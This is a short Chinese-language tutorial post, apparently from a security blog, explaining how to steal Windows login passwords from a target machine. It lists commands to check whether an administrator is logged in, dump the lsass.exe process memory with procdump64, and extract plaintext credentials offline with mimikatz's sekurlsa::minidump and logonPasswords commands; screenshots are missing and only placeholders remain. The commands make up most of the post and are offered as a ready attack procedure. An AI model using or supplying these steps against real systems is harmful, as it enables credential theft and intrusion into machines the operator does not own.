Prodump+Mimikatz抓取windows系統密碼

1、查看目標系統管理員登錄情況,管理員在線,抓到明文密碼的可能性更大。
query user
在這裏插入圖片描述

2、查看目標系統版本。
wmic OS get Caption,OSArchitecture
在這裏插入圖片描述
3、通過Procdump dump lsass.exe 進程數據並將其保存到 lsass.dmp 文件中。
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
在這裏插入圖片描述
4、將lsass.tmp拉取到本地使用mimikatz解密目標系統密碼。(本地機器需與目標機器的版本位數一致。)
mimikatz.exe “log res.log” “sekurlsa::minidump tmp.dmp” “sekurlsa::logonPasswords full” exit
在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章